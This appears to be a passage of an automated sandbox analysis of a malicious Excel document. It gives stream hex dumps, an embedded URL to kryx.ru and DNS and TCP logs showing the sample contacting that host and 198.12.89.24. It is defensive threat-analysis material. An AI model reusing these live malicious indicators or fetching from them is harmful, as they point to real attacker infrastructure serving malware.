                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD0077BD89/MBD00320C7F/Package
                                CLSID:
                                File Type:Microsoft Excel 2007+
                                Stream Size:613686
                                Entropy:7.989056691241232
                                Base64 Encoded:True
                                Data ASCII:P K . . . . . . . . . . ! . . X . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 1a 58 13 82 c0 01 00 00 90 07 00 00 13 00 bb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 b7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD0077BD89/MBD00321A49/\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:114
                                Entropy:4.219515110876372
                                Base64 Encoded:False
                                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD0077BD89/MBD00321A49/Package
                                CLSID:
                                File Type:Microsoft Excel 2007+
                                Stream Size:13665
                                Entropy:7.1661074658165225
                                Base64 Encoded:True
                                Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 9d a8 db 7e 01 00 00 85 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD0077BD89/Workbook
                                CLSID:
                                File Type:Applesoft BASIC program data, first line number 16
                                Stream Size:392615
                                Entropy:7.73377528201003
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . h : . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . .
                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                General
                                Stream Path:MBD0077BD8A/\x1Ole
                                CLSID:
                                File Type:data
                                Stream Size:766
                                Entropy:4.395128602979874
                                Base64 Encoded:False
                                Data ASCII:. . . . . F b . 4 . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . k . r . y . x . . . r . u . / . R . N . F . 5 . 2 . o . ? . & . v . e . s . t . m . e . n . t . = . h . a . r . d . & . f . i . r . e . w . a . l . l . = . t . a . s . t . e . l . e . s . s . & . b . r . e . a . d . = . r . a . p . i . d . & . b . e . n . e . f . i . c . i . a . r . y . . . . d E s s . ! y V > k . 1 e K . . . . . . . . . . . . . . . . . . . o . K . i . p . 8 . W . f . 0 . h . w . t . 2 . L . F
                                Data Raw:01 00 00 02 93 0a 46 62 2e dc c7 34 00 00 00 00 00 00 00 00 00 00 00 00 c4 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c0 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6b 00 72 00 79 00 78 00 2e 00 72 00 75 00 2f 00 52 00 4e 00 46 00 35 00 32 00 6f 00 3f 00 26 00 76 00 65 00 73 00 74 00 6d 00 65 00 6e 00 74 00 3d 00 68 00 61 00 72 00 64 00 26 00 66 00 69 00
                                General
                                Stream Path:Workbook
                                CLSID:
                                File Type:Applesoft BASIC program data, first line number 16
                                Stream Size:96259
                                Entropy:7.991524030987595
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . G 3 ] d , a . r . . . 0 ' . 2 ( [ v # f 5 . S d R . . R . . . . . . . . . . . . . . \\ . p . K ! | v _ % X l ; X } H ; _ 1 . + S > l . m q D { . . . . [ * z < P z ^ l W 6 } . . Y . ) . . N . i _ N . . + I y / ^ 8 . d . 3 ] $ . n B . . . k a . . . f D . . . = . . . . " . . . . ( j j @ | j . @ . . . @ . . . . _ . . . . ( . . . . . H . . . . . . . h = . . . S ~ M i r g 5 @ . . . w % . . . " . . . . . . . . . . . . e . . . p ] 1 . . . P | . p G < . s . } 7
                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c8 96 47 f7 f0 33 5d 64 a7 2c 61 a9 07 72 8e a4 06 0c 0f 30 27 b0 da ca 81 b7 32 28 df e8 fb 5b 76 9f d7 23 66 d9 35 18 53 64 52 93 08 c1 00 52 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 18 c3 e2 00 00 00 5c 00 70 00 4b 21 7c c6 76 5f c8 25 58 6c 3b 9a c4 58 7d 48 3b 86 ef fe 5f c3 31 13 2b 53
                                General
                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                CLSID:
                                File Type:ASCII text, with CRLF line terminators
                                Stream Size:531
                                Entropy:5.24079173205235
                                Base64 Encoded:True
                                Data ASCII:I D = " { E 5 D C 6 7 6 2 - E 3 0 F - 4 6 A 4 - 8 0 0 C - D 2 9 7 1 8 2 A 1 A 6 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 C 5 E 9 4 9 F F 4 5 C F 8 5 C F
                                Data Raw:49 44 3d 22 7b 45 35 44 43 36 37 36 32 2d 45 33 30 46 2d 34 36 41 34 2d 38 30 30 43 2d 44 32 39 37 31 38 32 41 31 41 36 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                General
                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                CLSID:
                                File Type:data
                                Stream Size:104
                                Entropy:3.0488640812019017
                                Base64 Encoded:False
                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                CLSID:
                                File Type:data
                                Stream Size:2644
                                Entropy:4.000028931791667
                                Base64 Encoded:False
                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                CLSID:
                                File Type:data
                                Stream Size:553
                                Entropy:6.379472483054293
                                Base64 Encoded:True
                                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 6 i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 8d 36 eb 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                TimestampSource PortDest PortSource IPDest IP
                                Mar 15, 2025 08:50:08.450865030 CET5799153192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:08.456501961 CET53579911.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:08.456569910 CET5799153192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:08.456749916 CET5799153192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:08.461378098 CET53579911.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:08.900079012 CET53579911.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:08.902084112 CET5799153192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:08.908720016 CET53579911.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:08.909768105 CET5799153192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:14.791652918 CET6371653192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:14.798413992 CET53637161.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:14.798487902 CET6371653192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:14.805015087 CET53637161.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:15.263289928 CET6371653192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:15.268166065 CET53637161.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:15.268232107 CET6371653192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:28.309576035 CET4998453192.168.2.26162.159.36.2
                                Mar 15, 2025 08:50:28.314280033 CET5349984162.159.36.2192.168.2.26
                                Mar 15, 2025 08:50:28.314361095 CET4998453192.168.2.26162.159.36.2
                                Mar 15, 2025 08:50:28.319044113 CET5349984162.159.36.2192.168.2.26
                                Mar 15, 2025 08:50:28.758208036 CET4998453192.168.2.26162.159.36.2
                                Mar 15, 2025 08:50:28.763000011 CET5349984162.159.36.2192.168.2.26
                                Mar 15, 2025 08:50:28.763076067 CET4998453192.168.2.26162.159.36.2
                                Mar 15, 2025 08:50:57.123116970 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:57.123172045 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:57.123277903 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:57.124375105 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:57.124391079 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:57.809034109 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:57.809350967 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:57.878498077 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:57.878544092 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:57.879853964 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:57.879996061 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:57.893974066 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:57.894172907 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:57.894237995 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:57.894246101 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:57.894282103 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:58.051393986 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:58.096327066 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:58.262487888 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:58.262563944 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:58.262589931 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:58.262604952 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:58.262634993 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:58.262656927 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:58.267177105 CET49991443192.168.2.26188.225.72.170
                                Mar 15, 2025 08:50:58.267200947 CET44349991188.225.72.170192.168.2.26
                                Mar 15, 2025 08:50:58.268990993 CET4999280192.168.2.26198.12.89.24
                                Mar 15, 2025 08:50:58.273761034 CET8049992198.12.89.24192.168.2.26
                                Mar 15, 2025 08:50:58.273844957 CET4999280192.168.2.26198.12.89.24
                                Mar 15, 2025 08:50:58.273994923 CET4999280192.168.2.26198.12.89.24
                                Mar 15, 2025 08:50:58.278651953 CET8049992198.12.89.24192.168.2.26
                                Mar 15, 2025 08:50:58.738991022 CET8049992198.12.89.24192.168.2.26
                                Mar 15, 2025 08:50:58.739017010 CET8049992198.12.89.24192.168.2.26
                                Mar 15, 2025 08:50:58.739141941 CET4999280192.168.2.26198.12.89.24
                                Mar 15, 2025 08:51:03.748584986 CET8049992198.12.89.24192.168.2.26
                                Mar 15, 2025 08:51:03.748729944 CET4999280192.168.2.26198.12.89.24
                                Mar 15, 2025 08:51:12.500850916 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:12.500894070 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:12.501018047 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:12.501024961 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:12.501066923 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:12.501595020 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:12.501595020 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:12.501609087 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:12.501753092 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:12.501763105 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.182933092 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.183020115 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.183887005 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.183975935 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.185590982 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.185606003 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.185707092 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.185725927 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.185903072 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.186178923 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.186837912 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.187588930 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.228327036 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.228328943 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.283055067 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.283128023 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.283508062 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.284085989 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.284104109 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.284156084 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.284185886 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.284365892 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.284398079 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.284410954 CET49997443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.284418106 CET4434999713.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.284537077 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.284703016 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.284724951 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:13.284738064 CET49996443192.168.2.2613.107.246.60
                                Mar 15, 2025 08:51:13.284744024 CET4434999613.107.246.60192.168.2.26
                                Mar 15, 2025 08:51:56.149180889 CET4999280192.168.2.26198.12.89.24
                                Mar 15, 2025 08:51:56.461587906 CET4999280192.168.2.26198.12.89.24
                                Mar 15, 2025 08:51:56.599509954 CET8049992198.12.89.24192.168.2.26
                                Mar 15, 2025 08:51:56.599533081 CET8049992198.12.89.24192.168.2.26
                                Mar 15, 2025 08:51:56.599682093 CET4999280192.168.2.26198.12.89.24
                                TimestampSource PortDest PortSource IPDest IP
                                Mar 15, 2025 08:49:54.398936987 CET6485653192.168.2.261.1.1.1
                                Mar 15, 2025 08:49:54.405806065 CET53648561.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:01.239556074 CET6485653192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:01.271272898 CET53648561.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:08.449906111 CET53648521.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:14.791186094 CET53648521.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:28.309218884 CET5353320162.159.36.2192.168.2.26
                                Mar 15, 2025 08:50:28.760571003 CET5641453192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:28.768632889 CET53564141.1.1.1192.168.2.26
                                Mar 15, 2025 08:50:56.987638950 CET5641453192.168.2.261.1.1.1
                                Mar 15, 2025 08:50:57.121799946 CET53564141.1.1.1192.168.2.26
                                Mar 15, 2025 08:51:12.490444899 CET5641453192.168.2.261.1.1.1
                                Mar 15, 2025 08:51:12.498569012 CET53564141.1.1.1192.168.2.26
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Mar 15, 2025 08:49:54.398936987 CET192.168.2.261.1.1.10xe546Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                Mar 15, 2025 08:50:01.239556074 CET192.168.2.261.1.1.10x79b1Standard query (0)browser.events.data.msn.cnA (IP address)IN (0x0001)false
                                Mar 15, 2025 08:50:28.760571003 CET192.168.2.261.1.1.10xba82Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                Mar 15, 2025 08:50:56.987638950 CET192.168.2.261.1.1.10x287dStandard query (0)kryx.ruA (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:12.490444899 CET192.168.2.261.1.1.10xf4d2Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Mar 15, 2025 08:49:54.405806065 CET1.1.1.1192.168.2.260xe546No error (0)assets.msn.comassets.msn.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:49:54.405806065 CET1.1.1.1192.168.2.260xe546No error (0)assets.msn.com.edgesuite.neta233.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:49:54.405806065 CET1.1.1.1192.168.2.260xe546No error (0)a233.dscd.akamai.net2.16.164.19A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:49:54.405806065 CET1.1.1.1192.168.2.260xe546No error (0)a233.dscd.akamai.net2.16.164.105A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:49:54.405806065 CET1.1.1.1192.168.2.260xe546No error (0)a233.dscd.akamai.net2.16.164.48A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:49:54.405806065 CET1.1.1.1192.168.2.260xe546No error (0)a233.dscd.akamai.net2.16.164.8A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:49:54.405806065 CET1.1.1.1192.168.2.260xe546No error (0)a233.dscd.akamai.net2.16.164.16A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:49:54.405806065 CET1.1.1.1192.168.2.260xe546No error (0)a233.dscd.akamai.net2.16.164.112A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:50:01.271272898 CET1.1.1.1192.168.2.260x79b1No error (0)browser.events.data.msn.cnglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:50:01.271272898 CET1.1.1.1192.168.2.260x79b1No error (0)global.asimov.events.data.trafficmanager.netonedscolprdcus07.centralus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:50:01.271272898 CET1.1.1.1192.168.2.260x79b1No error (0)onedscolprdcus07.centralus.cloudapp.azure.com52.182.143.209A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:50:08.093373060 CET1.1.1.1192.168.2.260xf74cNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:50:08.093373060 CET1.1.1.1192.168.2.260xf74cNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:50:08.093373060 CET1.1.1.1192.168.2.260xf74cNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:50:28.768632889 CET1.1.1.1192.168.2.260xba82Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                Mar 15, 2025 08:50:57.121799946 CET1.1.1.1192.168.2.260x287dNo error (0)kryx.ru188.225.72.170A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:05.633805990 CET1.1.1.1192.168.2.260xd3d3No error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:51:05.633805990 CET1.1.1.1192.168.2.260xd3d3No error (0)a726.dscd.akamai.net2.16.164.131A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:05.633805990 CET1.1.1.1192.168.2.260xd3d3No error (0)a726.dscd.akamai.net2.16.164.40A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:05.633805990 CET1.1.1.1192.168.2.260xd3d3No error (0)a726.dscd.akamai.net2.16.164.128A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:05.633805990 CET1.1.1.1192.168.2.260xd3d3No error (0)a726.dscd.akamai.net2.16.164.65A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:05.633805990 CET1.1.1.1192.168.2.260xd3d3No error (0)a726.dscd.akamai.net2.16.164.80A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:12.498569012 CET1.1.1.1192.168.2.260xf4d2No error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:51:12.498569012 CET1.1.1.1192.168.2.260xf4d2No error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:51:12.498569012 CET1.1.1.1192.168.2.260xf4d2No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:51:12.498569012 CET1.1.1.1192.168.2.260xf4d2No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:51:12.498569012 CET1.1.1.1192.168.2.260xf4d2No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:21.929672956 CET1.1.1.1192.168.2.260x2643No error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                Mar 15, 2025 08:51:21.929672956 CET1.1.1.1192.168.2.260x2643No error (0)a726.dscd.akamai.net2.16.164.65A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:21.929672956 CET1.1.1.1192.168.2.260x2643No error (0)a726.dscd.akamai.net2.16.164.131A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:21.929672956 CET1.1.1.1192.168.2.260x2643No error (0)a726.dscd.akamai.net2.16.164.80A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:21.929672956 CET1.1.1.1192.168.2.260x2643No error (0)a726.dscd.akamai.net2.16.164.40A (IP address)IN (0x0001)false
                                Mar 15, 2025 08:51:25.756225109 CET1.1.1.1192.168.2.260xaa59No error (0)onedscolprdcus07.centralus.cloudapp.azure.com52.182.143.209A (IP address)IN (0x0001)false
                                • browser.events.data.msn.cn
